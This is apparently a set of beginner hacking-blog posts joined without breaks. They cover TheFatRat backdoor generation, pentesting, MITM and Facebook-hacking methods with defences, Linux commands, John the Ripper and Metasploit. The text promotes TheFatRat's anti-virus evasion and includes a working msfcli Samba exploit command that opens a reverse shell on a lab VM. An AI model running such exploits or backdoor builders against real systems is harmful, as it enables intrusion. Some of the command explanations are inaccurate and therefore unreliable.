TheFatRat is an exploiting tool that compiles malware with a famous payload, and then the compiled malware can be executed on Linux, Windows, Mac, and Android. Also, it Provides An Easy way to create Backdoors and Payload which can bypass most anti-virus.
What is a backdoor
A backdoor is a malware type that negates normal authentication procedures to access a system. As a result, remote access is granted to resources within an application, such as databases and file servers, giving perpetrators the ability to remotely issue system commands and update malware.
TheFatRat is a powerful tool and it also has many features which can impress you and convince you to use it.
Fully Automating MSFvenom & Metasploit.
Local or remote listener Generation.
Easily Make Backdoor by category Operating System.
Generate payloads in Various formats.
Bypass anti-virus backdoors.
File pumper that you can use for increasing the size of your files.
The ability to detect external IP & Interface address.
Automatically creates AutoRun files for USB / CDROM exploitation
Uses of TheFatRat
FatRat is used for exploitation.
Is used to create malware
TheFatRat is used to combine payload with malware.
Also, TheFatrat is used for creating Backdoors for Post Exploitation.
TheFatRat is used for browser attacks.
FatRat is used to get DDL files from Linux.
FatRat can create malware in different extensions.
After cloning is completed, type cd TheFatrat, and then hit enter.
We can see the setup.sh file. To execute this file we need to give executable permission, to do that we run the following command in the terminal. Then, type chmod +x setup.sh and hit enter.
Type sudo ./setup.sh and hit enter the start the installation it will ask you your root password. Then, an updating Kali repo popup appears. Then, the tool starts the installation process. It will check for all the necessary tools are installed in the system to run FatRat. If some tools are missing in the system FatRat will auto-install them.
After the update windows close, TheFatRat asks to create a shortcut in the system type y, and hit enter. Take a cup of coffee and relax
Then. after the installation is complete, in the terminal type fatrat and hit enter.
You must know that TheFatRat work together with Metasploit Framework (MSF) is far more than just a collection of exploits–it is also a solid foundation that you can build upon and easily customize to meet your needs. This allows you to concentrate on your unique target environment and not have to reinvent the wheel.
How to troubleshoot TheFatRat
chk_tools script to use in case of problems in setup.sh of fatrat this script will check if everything is in the right version to run fatrat and will also provide you a solution for the problem
chmod +x chk_tools
This article is for educational purposes only, usage of TheFatRat for attacking targets without prior mutual consent is illegal. We assume no liability and are not responsible for any misuse or damage caused by this program.
Do you want to get into the penetration testing field?. if yes, we are going to discuss how you can stop being a script-kiddies and become a good penetration tester. If you are reading this article, you are on a good way to become an expert in penetration testing.
The way has never been easy but you can reach it if others reached it. But depend on the energy and effort you are going to put into it.
Then, before we continue with this article, let us see first what penetration testing really is. because some are having confusion about penetration testing and Ethical hacking.
Penetration testing is a type of security testing that is used to test the security of an application. It is conducted to find a security risk that might be present in a system.
When a system is not secure, then it’s easy for an attacker to get into it. Security is normally an accidental error that occurs while developing a system.
why is penetration testing important?
You must understand that penetration testing is very important to assured the system or network security. Also, penetration testing normally must evaluate the system’s ability in order to be protected.
Also, penetration testing must assure that only external or internal authorized users can access the system.
Then, penetration testing is important because:
It provides evidence to suggest why it is important to increase investment in security aspect of technology
also, it estimates the volume of the attack
It supports avoid black hat attack and also protects the original data.
helps also to detect the weakness of the system
Attention: penetration testing is not only to know the list of tools used to test and to know how to use them. But a real penetration tester must be able to proceed rigorously and detect the weaknesses of a system. They must be able to identify the technology behind them and test every single door that might be open to attackers.
Also, this is important to inform yourself about the law and what you are allowed to do or not. According to your country, the computer laws are not the same. First, check laws about privacy and surveillance: Nine eyes countries, Five eyes, and Fourteen Eyes. Always check if what you’re doing is legal. Even when it’s not offensive, information gathering can also be illegal!
The penetration tester not only discovers vulnerabilities that could be used by attackers. But also must be able to exploit those vulnerabilities, to assess what attackers might gain after a successful exploitation
How is penetration testing Beneficial?
While the practice of penetration testing is growing in popularity, it comes with the benefit.
Identify and resolve system vulnerabilities: penetration testing is that penetration testers put themselves in a hacker’s position. By staying on the pulse of the cybersecurity world and regularly approaching IT systems from a cybercriminal’s perspective, penetration testers can identify a wide range of vulnerabilities and weaknesses in the system.
Gain valuable insights into digital systems: Reports from penetration testing can provide a valuable details about the network or system, its weak points, and how to strengthen it.
Establish trust with your clientele: A cyberattack or data breach negatively affects the confidence and loyalty of your customers, vendors, and partners.
Protection from financial damage: A simple breach of security system may cause millions of dollars of damage. Penetration testing can protect the organization from such damages.
some vocabulary related to penetration testing
Penetration tester: Is an ethical hacker who practices security, tests applications and systems to prevent intrusions or find vulnerabilities.
Reverse engineering: Reverse engineering, also called back engineering, is the process by which a man-made object is deconstructed to reveal its designs, architecture, or to extract knowledge from the object. Similar to scientific research, the only difference being that scientific research is about a natural phenomenon.
Social engineering: In the context of information security, it refers to psychological manipulation of people into performing actions or divulging confidential information.
Security researcher: Someone who practices pen testing and browses the web to find phishing/fake websites, infected servers, bugs, or vulnerabilities. They can work for a company as a security consultant and are most like a Blue team.
Penetration tester skills required
A penetration tester need to know how to modify existing exploits to get them to work in specific networks for testing purposes. But no single tester can possibly be an expert across all domains, but they need to be active learners and develop real-world experiences.
Understanding of secure web communications and technologies
You need an understanding of web technologies. Web applications are a well-accepted portion of just about every assessment we do these days, and everybody needs to understand them. Our assessors need to know how web applications are built, how to identify input fields, and how to gather the information that can lead to exploiting the functionality of the web application.
Learning programming is the very first way to start learning about security. There’s a lot of languages, most people start with Python, which’s the easiest and the most popular one. PHP and Go are the less popular to write security-related stuff, but any of these can still be used in such context. Bash and PowerShell are mostly about scripting and writing simple CLI applications.
First, a CMS is computer software used to manage the creation and modification of digital content. Digging into the functionalities and security of CMS’s will open your door to a better understanding of how you can manage when in front of one below:
Steps of Penetration Testing
Before the tester starts the vulnerability analysis of a system there are some crucial steps that he must follow. each step is important in order to elaborate a good report after finish the work.
The Kali Linux penetration testing platform contains a vast array of tools and utilities. From information gathering to final reporting, Kali Linux enables security and IT professionals to assess the security of their systems.
A man in the middle (MITM) attack is a general term for when a perpetrator positions himself in a conversation between a user and an application, either to eavesdrop or to impersonate one of the parties, making it appear as if a normal exchange of information is underway.
The goal of an attack is to steal personal information, such as login credentials, account details, and credit card numbers. Targets are typically the users of financial applications, SaaS businesses, e-commerce sites, and other websites where logging in is required.
Information obtained during an attack could be used for many purposes, including identity theft, unapproved fund transfers, or an illicit password change.
Additionally, a man in the middle attack requires three players. There’s the victim is trying to communicate, and the man-in-the-middle, who is intercepting the victim’s communications. Critical to the scenario is that the victim isn’t aware of the MITM.
How does a Man In The Middle Attack work?
Let’s say you received an email that appeared to be from your bank, asking you to log in to your account to confirm your contact information. Then, you click on a link in the email received and are taken to what appears to be your bank’s website, where you log in and perform the requested task.
In such a scenario, the man in the middle (MITM) sent you the email, making it appear to be legitimate.
This attack also involves phishing, getting you to click on the email appearing to come from your bank.
Also, he created a website that looks just like your bank’s website, so you wouldn’t hesitate to enter your login credentials after clicking the link in the email. And the time you log in, you are not logging into your bank account, but you are handing over your credentials to the attacker.
Man In The Middle attack progression
Man In The Middle attacks come in two forms, one that involves physical proximity to the intended target, and another that involves malicious software, or malware.
Successful MITM execution has two distinct phases: interception and decryption.
The first step intercepts user traffic through the attacker’s network before it reaches its intended destination.
The most common (and simplest) way of doing this is a passive attack in which an attacker makes free, malicious WiFi hotspots available to the public. Typically named in a way that corresponds to their location, they aren’t password protected. Once a victim connects to such a hotspot, the attacker gains full visibility to any online data exchange.
When an attacker wishing to take a more active approach to interception, he may launch one of the following attacks:
IP spoofing involves an attacker disguising himself as an application by altering packet headers in an IP address. As a result, users attempting to access a URL connected to the application are sent to the attacker’s website.
ARP spoofing is the process of linking an attacker’s MAC address with the IP address of a legitimate user on a local area network using fake ARP messages. As a result, data sent by the user to the host IP address is instead transmitted to the attacker.
DNS spoofing, also known as DNS cache poisoning, involves infiltrating a DNS server and altering a website’s address record. As a result, users attempting to access the site are sent by the altered DNS record to the attacker’s site.
After an interception, any two-way SSL traffic needs to be decrypted without alerting the user or application. A number of methods exist to achieve this:
HTTPS spoofing sends a phony certificate to the victim’s browser once the initial connection request to a secure site is made. It holds a digital thumbprint associated with the compromised application, which the browser verifies according to an existing list of trusted sites. The attacker is then able to access any data entered by the victim before it’s passed to the application.
SSL hijacking occurs when an attacker passes forged authentication keys to both the user and the application during a TCP handshake. This sets up what appears to be a secure connection when, in fact, the man in the middle controls the entire session.
SSL stripping downgrades an HTTPS connection to HTTP by intercepting the TLS authentication sent from the application to the user. The attacker sends an unencrypted version of the application’s site to the user while maintaining the secured session with the application. Meanwhile, the user’s entire session is visible to the attacker.
Blocking MITM attacks requires several practical steps on the part of users, as well as a combination of encryption and verification methods for applications.
Also, with the amount of tools readily available to cybercriminals for carrying out Man In The Middle attacks, it makes sense to take steps to help protect your devices, your data.
make sure you always visit website with the HTTPS
Be wary of potential phishing emails from attackers asking you to update your password or any other login credentials. Instead of clicking on the link provided in the email, manually type the website address into your browser.
Never connect to public WIFI routers directly, if possible a VPN encrypts your internet connection on public hotspots to protect the private data you send and receive while using public WIFI, like passwords or credit card information.
Avoiding WIFI connections that aren’t password protected.
For website operators, secure communication protocols, including TLS and HTTPS, help mitigate spoofing attacks by robustly encrypting and authenticating transmitted data. Doing so prevents the interception of site traffic and blocks the decryption of sensitive data, such as authentication tokens.
Facebook is, undoubtedly, the most popular social networking website with more than 500 million active users. Due to its popularity, many bad guys (black hackers) are actively involved in hacking Facebook accounts of unsuspecting users. Most people may ask why hackers hack Facebook accounts.
This article outlines strategies that hackers use to gain access to the Facebook accounts of hundreds of users each day. Also, you will see how you can prevent some attacks from hacking your account. In the previous article, we discussed how to protect the Facebook account from hackers
Why do bad guys try to hack Facebook accounts?
As I mentioned above Facebook is a popular social networking website, this brings many people to try to access someone’s Facebook account without his consent.
You must also know that hackers can try to access your account for modifying your information, exposing your information, or maybe for fun. Some of the beginners in hacking (script kiddies) try to use some hacking tools developed by professional hackers to hack Facebook account. Also, they can try to hack Facebook account because of:
Exposing your information.
Modifying your data
Because of love reasons
For joking or celebrity.
How do they do to hack Facebook accounts? and which technics do they use?
Although Facebook is more secure there are some technics hackers use to hack Facebook account like phishing, keylogging, Trojans/backdoors, Sniffing, Social Engineering, and Sessions Hijacking …
Phishing – hack Facebook accounts
Phishing is one of the easiest ways to trick users into giving out their login credentials. All a hacker does is set up a webpage similar in design to that of the Facebook homepage, attach a server-side script to track the username and password entered, and store it in a log.
A new trend amongst phishers is creating Facebook look-a-like widgets for stealing user’s login credentials. The hacker sends you the link by using some attractive words or other technics like:
Hey, do you know that Facebook has a new update? Install the new update by following this link.
And after the hacker has sent you the link and attractive message he will be waiting for you just to log in and get your information and your account will be hacked. But nowadays Facebook blocks phishing links. Then, know that it can’t block phishing links only if the hacker used another method to send the link.
How to prevent yourself from being phished?
At all costs, avoid clicking on suspicious links. Moreover, always check the URL in the address bar before signing in. Avoid logging in through various “Facebook widgets” offered by websites and blogs. Instead, use Facebook’s homepage to sign in.
Always try to use Safe Search while searching. If you do manage to get phished, report the website so that others may get a warning before visiting it. You can also read our article how to secure Facebook account from hackers to prevent against attacks.
Keylogging – hack Facebook accounts
Keylogger is a type of computer virus that tracks key strokes. Keyloggers can be installed remotely on a computer system by a cracker to record all the activity that is going on the victim’s computer. Also, it can get easier if the hacker has physical access to the victim’s computer.
Also, know that with this technic a hacker can record all your activities; he can get you username, password and more other information.
How to stop keyloggers?
If you want stop to be keylogging install a good antivirus and update it frequently. Do not click on suspicious links and avoid downloading illegal software. Also, avoid installing free toolbars and other such spam software. Always scan third-person’s flash and pen drives before using them on your computer.
Social engineering is the art or better yet, science, of skillfully maneuvering human beings to take action in some aspect of their lives.
Also, social engineering involves using any trick to fool the user into making himself vulnerable to exploits. This could involve anything from sending spoof emails, pretending to be from Facebook, telling you to change your password to 123456 to a hacker maliciously getting out the answer to your Security Question in a friendly chat or discussion.
How to prevent yourself from being socially engineered?
The only true way to reduce the effect of these attacks is to know that they exist, to know how they are done, and to understand the thinking process and mentality of the people who would do such things. Also, stay aware during chats and discussions.
Also, use a tough security question, preferably one whose answer you would never disclose to anyone. Moreover, Facebook, or any other company for that matter, will never ask you to change your password or do something as silly as asking you to send out your login details to prove that you are an active user.
Always think before taking action and your e-life on Facebook will be safe from hackers looking to hack Facebook accounts.
Also, hackers try to hack your email address to get into your account. It can be easy for a hacker to access your account if he knows your email account used on your Facebook account.
I know you may ask yourself how can it be possible, but know that a hacker can use brute force attack to get your password and access your account reason why avoid making public your email account. I will recommend you to read our article on how to protect the Facebook account from hackers.
This guide is all about how to become an ethical hacker. Then, before we continue we have first to know who are ethical hackers and what they can do. Becoming an ethical hacker may seem easy in theory. But to become a good hacker you have to follow some steps.
Who is a hacker?
The word hacker originally defined a skilled programmer proficient in machine code and computer operating systems. Also, a hacker is a person who breaks into a computer system. The reason for hacking can be many: installing malware, stealing, or destroying data.
Hackers can be also there to find software vulnerabilities in order to fix them.
How does hacking work?
Hackers breach defenses to gain unauthorized access into computers, phones, tablets, IoT devices, networks, or entire computing systems. Hackers also take advantage of weaknesses in network security to gain access. The weaknesses can be technical or social in nature. Let also see some types of hackers.
Now as you already know who is a hacker let us see also what is ethical hacking.
what is ethical hacking?
Ethical hacking involves the legal use of hacking techniques for benevolent versus malicious purposes. Ethical hackers use penetration testing and other tactics to find software vulnerabilities and other security weaknesses so they can be promptly addressed.
Who is a penetration tester?
Many people think that a Penetration Tester is just a White Hat Hacker but this is wrong… White Hat Hacker is anyone who works or fight to protect the cyber security…
Penetration Testers are essentially Gray Hat Hackers. They are between the two worlds… this makes Penetration Testers be the most Advanced Hackers because they know how to attack and how to protect!
who is an ethical hacker?
The term ethical hacker includes all security professionals that provide offensive services, whether red team, pentester, or freelance offensive consultant. Also, an ethical hacker’s primary purpose is to view security from the adversary’s perspective in an effort to find vulnerabilities that could be exploited by bad actors.
Role of an ethical hacker
Ethical hackers can be independent freelance consultants, employed by a firm that specializes in simulated offensive cybersecurity services, or they can be an in-house employee protecting a company’s website or apps.
Possessing ethical hacker skills and knowledge is helpful for many other security roles
Now can see then how to become an ethical hacker as you already who he is and what he can do.
The skills required to become an ethical hacker
While there are plenty of anecdotal stories of blackhat hackers being converted to be whitehats in a bygone era, the most important requirement for becoming a successful ethical hacker today is to have, as is found in the name, high ethical standards.
Ethics are what separates the good guys from the bad guys. There are plenty of blackhat hackers that have adequate technical skills to be ethical hackers, but they lack the discipline of character to do the right thing regardless of the perceived benefits of doing otherwise.
A candidate for an ethical hacker job must be able to demonstrate advanced cybersecurity technical skills. The ability to recommend mitigation and remediation strategies is a part of the desired experience.
To become an ethical hacker you have to understand the networks.
A hacker should be able to gather information about a network with the intent to secure the network system. He can also use various tools like Telnet, NS lookup, Ping, Tracert, etc.
Also an ethical hacker must know about the networking and how a network work. He must know about fundamentals of network such as: network models, IP address and network protocols etc. Networking skills is very important in ethical hacking field. Almost all devices are connected to the network.
An ethical hacker must be proficient with operating systems, especially Windows and Linux
Linux System hacking
Linux is an operating system that acts as an intermediary as a bridge between the physical device and the instruction code of the program. in our previous article, we discussed the Linux tutorial for beginners.
You may find that many people on the internet say that you don’t need to know how to program to be a hacker, I don’t judge them but programming is more important in hacking. Sure you may perform some attacks without programming skills by using other script, but at a given point it will require you to have skills in programming.
Programming languages that an ethical hacker need to know
How to get experience as an ethical hacker
Experience with vulnerability testing tools, such as Metasploit, Netsparker, and OpenVAS, is very helpful for ethical hackers. These tools and there are many more of them, are designed to save time when searching for known vulnerabilities. These or similar tools may provide a useful framework for vulnerability scanning and management but should represent only the starting point for an experienced ethical hacker. Also, get in hands with kali linux operating system.
What is the Outlook for Ethical Hackers?
Cyberwarfare is extremely common, and many high-profile enterprises have been subject to major hacking issues. In this day and age, spending on IT security on a global scale is reaching the trillion-dollar mark. What better way to combat the threat of black-hat hacking than by making use of an army of white-hat hackers?
The demand for ethical hackers is at an all-time high and rising. Many experienced, ethical hackers can expect to earn in excess of $120,000 per year, especially if they are running their own consultancies or penetration testing companies.
Dear friends, the big day has finally arrived. If you are reading basic Linux commands for beginners I suppose that you have already read our previous article, Linux tutorial for beginners, and if not yet I suggest you have a look at it in order to be on the same level otherwise continue reading. You will get the chance to write your first command in the console! Okay, not too stressed?
I assure you, we will start with simple things to become familiar with the console. We’ll really see the ABC, the basic survival guide of kits.
Basic Linux Commands for beginners
Then, let us see what this article is going to cover.
First Commands on Linux command Line
Understand Super User on Linux
Commands & parameters
File operation Commands
account manager commands
What is the Linux shell?
Before we continue let me remind you what a Linux shell is. A Linux shell is a command-line interpreter or shell that provides a traditional user interface for the Linux operating system and for Linux-like systems. The shell understands plenty of shell commands and their options which change their action. The typical syntax of shell command looks like this: command –option argument (parameter).
Then, the time of testing your first command is now; open your Linux command line to write your first command. Also, know that for my side I use Kali Linux and all command you will find on this article was tested on kali.
This is a command prompt. It is a message that prompts you to enter a command by giving you at the same time a lot of information. This command prompt is displayed before each command you type.
Now let us explain something about what you are seeing in command line.
Anonymous: The first element is your nickname. This is the user name under which you are logged. Indeed, know that you can create multiple user accounts on Linux
@: This symbol indicates nothing special. It’s the symbol “at’”.
DESKTOP-4312L0R: That’s the name of the computer on which you are working. In my case it’s called DESKTOP-4312L0R, but I could give any name during OS installation.
~: That’s the folder where you currently are. You can also navigate folder to folder in the console and it’s very useful that you always be reminded where you are before each command.
$: Also, that symbol is very important, because it shows you your authority level. This symbol means you are currently a normal user with limited rights. If you are curious and you want to know why limited rights read the previous post about Linux tutorial for beginners-Linux guide in 2021.
Tasksel: This is a command to install some additional Linux components.
Understand Super User in Linux
In this part, we are going to see who is a root. Then, let us see what really Superuser means. know that in some distribution of Linux you are not allowed to log in as a superuser because of the security matters, the reason why by default Linux let you log in as a normal user.
Then, once you have log in, you can now run commands as a root but first, you have to run the command sudo su,and then it will ask you to confirm with the password. When typing a password it won’t show if you are typing, but if you write the right password confirm with the button enter.
$: This symbol means you are currently using a user “normal” account with limited rights (he cannot change the most important system files).
Also, if the symbol is “#”that mean you are in super user mode. That is to say, you are connected under the pseudonym “root”.The root is the master who has the right to do everything on the computer he can even run harmful commands.
parameters & Basic Linux Commands .
Command: It is a directive to a computer program acting as an interpreter of some kind, in order to perform a specific task. In Linux when you are typing command you are ordering the terminal to execute task for you.
Example: mkdir genius – here you ask the computer to create a folder named genius.
Parameters: Parameters are options that are written after the command. The command and parameters are separated by a space. The parameters themselves can contain spaces, letters, numbers … a bit of everything, really. There is no real rule on how the settings, but fortunately programmers have adopted a sort of “agreement” so that we can recognize the different types of parameters.
Also, know that there are two differents of parameters.
Short parameters: The most common parameters are constituted by a single letter preceded by a dash. For instance: -d, –l, –a.
If you have to give several parameters, you can do it like this: -d, –a, –U, –h. Also, you have to know that each parameter has different meanings.
Long parameters: The parameters consist of several letters are preceded by two dashes like this: –all, –version, –help
Commands and parameters Examples
Then, let’s have a further look about the commands and their parameters.
Su –l: switch user, (su: login as the root super user and –l: is a parameter meaning “login”).
Ls –a: list all contents, (ls: list content and –a: is a parameter meaning “all contents”.
rm -ri genius: (rm: removes a file or a directory, ri: is a parameter meaning remove a non-empty directory and its contents, and genius is the name of the directory to remove.)
usermod -lanonymous genius: (usermod: modify an existing user account, -l: is a parameter meaning “login name change”, anonymous: is the old user name, and genius: is the new user name we want to set).
whoami: shows the current user name, the output is “Anonymous”
File operation Basic Linux Commands
Then, let discuss how we can manage files on CL. Managing files on the Linux command line is not as complicate as beginners may think.
cpmyfile/genius: the command cp: copy, myfile: is the name of file you want to copy, and genius: is the directory where you want to copy myfile.
mv myfile/genius:mv: command to move a file, myfile: is the name of file you want to move, and genius: is the directory where you want to move myfile.
rm genius:rm: command to remove a file or directory, and genius: name of the file you want to remove. Also, you can use –ri as parameters if you want to remove a directory with all its contents.
wc myfile.txt: This is a command to count words on a given file. wc: show word count, and myfile.txt: Name and extension of the file.
lpr myfile.txt: the command of sending the myfile.txt to the printer. lpq command help to display the print queue
diff myfile1.txt myfile2.txt: the command diff: show the differences between two files, myfile1.txt: is the file to compare to myfile2.txt.
cmp file1.text file2.txt: this is the command to compare two files byte by byte.
Md5sum myfile.txt: this command will create an md5 checksum number. Output: f7tkgu5orj1fjt8kelc2os95nd57jf8r myfile2.txt.
grep hacking myfile.txt: the command grep: show all lines that contain “hacking” string. It shows a specified string.
egrep excellent myfile.txt: It seems similar with grep but the difference is that this command show the unique lines in the file.
look ab: this command show words matching a given prefix. The output will be: aba,abb,abc,abd…
Also, you may find that managing directories is simple as a beginner. Then, in this part we won’t see many commands but you can do research to get more.
mkdir genius: this command hell to create a new directory with the name genius.
rmdir genius: help to remove an empty directory. That mean you ask to the CL to remove the directory genius.
zip myfile.txt: this file help to compress a file to zipe format.
unzipmyfile.zip: Also, this command help to unzip a file from zip format.
Account manager Commands
Let us see how we can manage users accounts using Command line.
useradd username: add a new user account.
usermod-l oldname newname: Also, help to change the username.
userdel username: this command help to delete a user account.
passwd username: set a user account password
permission basic Linux commands
chmod752 myfile.txt: the command chmod: change the mode of access permission for myfile1.txt, 7: set user permission with write, read, execute, 5: set group permission with read, execute, 2: set others permission with write only.
chgrp groupname myfile.txt: chgrp: change group membership of a file. Also, groupname is the name of a given group if you created a group.
chown username myfile2.txt: the command chown: change ownership of myfile2.txt.
System basic Linux commands
job: this command displays the status of all jobs.
fg: Also, this command run a suspended job in foreground.
bg: run a suspended job in background
kill %4: this command kill a job by number or a process by pid
at 9:30 pm: Also, this command help to schedule a job run at a specified time. You can also display the scheduled jobs wit at command, and if you want remove a schedule use atrm command.
uptime: It also shows the system uptime.
top: Also, help to view the top active or specified process.
tar -xfarchive.tar: it also help to extract an archived tar file.
tar-cf archive.tar: create an archived tar file
date: also, help to display the date and time.
cal: it also help to display a calendar of month.
df: This command help to show disk usage of file system
host tgeniusclub.com: display remote hostname and IP
ifconfig: Also, display local network configuration
ping-c3 tgeniusclub.com: it also send packets to test if remote is reacheable
ssh: securely connect to a remote computer ftp: files transfer by “File Transfer Protocol”
mesg: it also enable or disable messaging
write: write a messages to other users
open: it help to connect to an ftp server
mail: Also, send and receive mails locally and globally.
dhclient: provides a means for configuring one or more network interfaces
nslookup: query internet name servers interactively for IP information.
Well done, this article was only for basic Linux commands hope now you are able to use your CL. If you want to know more about a command just use command man “name of command””
John the Ripper is an Open Source password security auditing and password recovery tool available for many operating systems.
Many people are asking this question, “How can I crack any password”. But let me tell you that if you are reading this post don’t worry you are in a good place. In this article, we are going to dive into John the Ripper (JtR), you will see how it work and explain to you why it’s important to use it.
In the previous article, we have seen how to install and start with Kali Linux. Now in this article, we are going to see how to start with John the Ripper and to use it. Then first let us see what is John the Ripper.
What is John the Ripper?
First, you have to know that John the Ripper is an Open Source password security auditing and password recovery tool available for many operating systems. It is designed to be both feature-rich and fast. It combines several cracking modes in one program and is fully configurable for your particular needs.
John the Ripper is available for several different platforms which enables you to use the same cracker everywhere. Also, It can support hundreds of hash and cipher types.
How can I get John the Ripper?
This is an amazing question that people may ask because after knowing what is John the Ripper, the next question must be how to get it. Now as you know what is John the Ripper let us see how to get it.
As I mentioned before John the Ripper is free and Open Source software, distributed primarily in source code form. If you would rather use a commercial product, please consider John the Ripper Pro, which is distributed primarily in the form of “native” packages for the target operating systems and in general is meant to be easier to install and use while delivering optimal performance.
Now, you can download John the Ripper on Linux, macOS, Windows, and Android on its official page Openwall.com/john. You must verify the authenticity and integrity of your John the Ripper downloads to make sure you downloaded a good one. Once you visit the official page you will get more information about that.
This is another question that some of you must ask, so let us respond to this question to satisfy everyone.
John the Ripper is a primary password cracker used during pen-testing exercises that can help IT guys spot weak passwords and poor password policies. It also supports several common encryption technologies for Unix and Windows-based Systems. It also autodetects the encryption on the hashed data.
John the Ripper also includes its own wordlists of common passwords for 20+ languages. John the RipperIs included in the pen-testing versions of Kali Linux.
John the Ripper uses the dictionary attack. it takes text string samples from a wordlist. It offers also brute force attacks. In this type of attack John the Ripper goes through all the possible plaintext, hashing data, and then compares them to the input hash.
Also, it uses character frequency tables to try plaintext containing more frequently used characters first.
The Metasploit Framework (MSF) is far more than just a collection of exploits–it is also a solid foundation that you can build upon and easily customize to meet your needs. This allows you to concentrate on your unique target environment and not have to reinvent the wheel.
Metasploit is one of the single most useful security auditing tools freely available to security professionals today, all the way to network information gathering tools and web vulnerability plugins, the Metasploit Framework provides a truly impressive work environment. Also, when speaking about Metasploit we can’t forget to speak about Kali Linux.
Kali Linux is a Debian-based Linux distribution aimed at advanced Penetration Testing and Security Auditing. It contains several hundred tools that are geared towards various information security tasks, such as Penetration Testing, Security research, Computer Forensics and Reverse Engineering.
Kali Linux is developed, funded and maintained by Offensive Security, a leading information security training company.
Metasploitable is an intentionally vulnerable Linux virtual machine that can be used to conduct security training, test security tools, and practice common penetration testing techniques.
The VM will run on any recent VMware products and other visualization technologies such as VirtualBox.
You can download the image file of Metasploitable 2 from SourceForge. Once you have downloaded the Metasploitable VM, extract the zip file, open up the .vmx file using your VMware product of choice, and power it on. Then after a brief time, the system will be booted and ready for action. The default login and password is msfadmin:msfadmin.
Metasploit is written in Ruby and has been in development for many years one can more easily understand the Metasploit architecture by taking a look under its hood.
In learning how to use Metasploit, take some time to make yourself familiar with its filesystem and libraries. In Kali Linux, Metasploit is provided in the Metasploit-framework package and is installed in the /usr/share/metasploit-framework directory, the top-level of which is shown below.
METASPLOIT OBJECT MODEL
In the Metasploit Framework, all modules are Ruby classes.
Modules inherit from the type-specific class
The type-specific class inherits from the Msf::Module class
There is a shared common API between modules
Payloads are slightly different.
Payloads are created at runtime from various components
Glue together stagers with stages
There are many different interfaces to use with this hacking tool, each with its own strengths and weaknesses. There is no one perfect interface to use with the Metasploit console, although the MSFConsole is the only supported way to access most Metasploit commands.
It is still beneficial, however, to be comfortable with all Metasploit interfaces.
The msfcli provides a powerful command line interface to the framework. This allows you to easily add Metasploit exploits into any scripts you may create.
Command Line Interface Commands
For msfcli help: type msfcli –h.
Note: when using msfcli, variables are assigned using the “equal to” operator = and that all options are case-sensitive.
root@kali:~# msfcli exploit/multi/samba/usermap_script RHOST=172.16.194.172 PAYLOAD=cmd/unix/reverse LHOST=172.16.194.163 E
[*] Please wait while we load the module tree...
=[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 936 exploits - 500 auxiliary - 151 post
+ -- --=[ 252 payloads - 28 encoders - 8 nops
=[ svn r15767 updated today (2012.08.22)
RHOST => 172.16.194.172
PAYLOAD > cmd/unix/reverse
[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo cSKqD83oiquo0xMr;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "cSKqD83oiquo0xMr\r\n"
[*] A is input...
[*] Command shell session 1 opened (172.16.194.163:4444 -> 172.16.194.172:57682) at 2012-06-14 09:58:19 -0400
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
If you aren’t entirely sure about what options belong to a particular module, you can append the letter O to the end of the string at whichever point you are stuck.
root@kali:~# msfcli exploit/multi/samba/usermap_script O
[*] Initializing modules...
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 139 yes The target port
To display available payloads for the current module, append the letter P to the msfcli command line string.
root@kali:~# msfcli exploit/multi/samba/usermap_script P
Benefits of the MSFcli Interface
Supports the launching of exploits and auxiliary modules
Useful for specific tasks
Good for learning
Convenient to use when testing or developing a new exploit
Good tool for one-off exploitation
Excellent if you know exactly which exploit and options you need
Wonderful for use in scripts and basic automation
The only real drawback of msfcli is that it is not supported quite as well as msfconsole and it can only handle one shell at a time, making it rather impractical for client-side attacks.
It also doesn’t support any of the advanced automation features of msfconsole.
congratulation you have reach the end hope now you know what metasploit is. if you hare having a question don’t keep for your self. share with us. for more information go offensive security official page
Did you know that most of Facebook account are been hacked by bad guys?
Facebook is a popular free social networking website that allows registered users to create profiles, upload photos, and videos, send messages and keep in touch with friends, family, and colleagues. The site, which is available in 37 different languages, includes public features such as:
Marketplace: it allows members to post, read and respond to classified ads.
Groups: it allows members who have common interests to find each other and interact.
Events: also allows members to publicize an event, invite guests and track who plans to attend.
Pages: it also, allows members to create and promote a public page built around a specific topic.
Presence technology – allows members to see which contacts are online and chat.
most Facebook accounts are hacked by bad guys who are looking for some information or just playing with hacking technics without even any profit on it. also, others are hacking Facebook account and appropriate your Facebook page if you are having more likes and followers for their future profit. so if you don’t want to be a future victim of Facebook account hackers, read this till the end.
Although Facebook is more secure there are some technics hackers are using to hack Facebook account like phishing, keylogging, Trojans/backdoors, Sniffing, Social Engineering, and Sessions Hijacking …
Log out of Facebook when you are sharing the same computer with someone.
Also it;s recommend to always log out your account if it’s not used on your one phone or pc. sometimes you can be using the friend phone, don’t forget to check if you really log out and delete all your information in that phone or pc.
Don’t accept friend requests from people you don’t know
Scammers may create fake accounts to friend people.
Becoming friends with scammers might allow them to spam your timeline, tag you in posts and send you malicious messages.
Keep your browser up to date
Also, you must keep your web browser up to date and remove suspicious applications or browser-add-ons
This includes links on Facebook (example: on posts) or in emails.
Keep in mind that Facebook will never ask you for your password in an email.
If you see a suspicious link on Facebook, you can report it
Use Facebook extra security options
You can also get alerts about unrecognized logins, and set up two-factor authentication.
If you’re logged in to Facebook on a computer, you can use Security Checkup to review your security settings.
Note: This feature is currently available to people logged into Facebook on a computer or the latest version of Facebook for Android or Facebook for iOS app.
Note that also Facebook is using HTTPS, Secure browsing : (HTTPS) is a security feature that automatically encrypts your connection to Facebook. This helps protect your account by making it harder for anyone to access your Facebook information without your permission.
In addition, a secure connection is required to connect to Facebook and can’t be turned off.
Congratulation you have reached the end of this post. Hope you have enjoyed it and you are now able to protect yourself against Scammers. If you are having any question or suggestion let us know
Accessing and managing file – Termux for ethical hacking
Now let us see, how we can manage and access file in Termux. There are three main types of storage in Termux.
Internal storage: files in $HOME, available from inside Termux or when explicitly in a SAF-compatible file manager.
Shared storage: general-purpose file storage available for all applications. You need to grant Termux storage access permission to use it.
External storage: external SD cards or USB hard drives. Typically read-only, except the Termux private directory.
Full read-write access to external SD cards and USB drives is available only on rooted devices. For those who are curious why some applications can write on external storage without restriction: these applications use special APIs (Storage Access Framework) not available for command line applications.
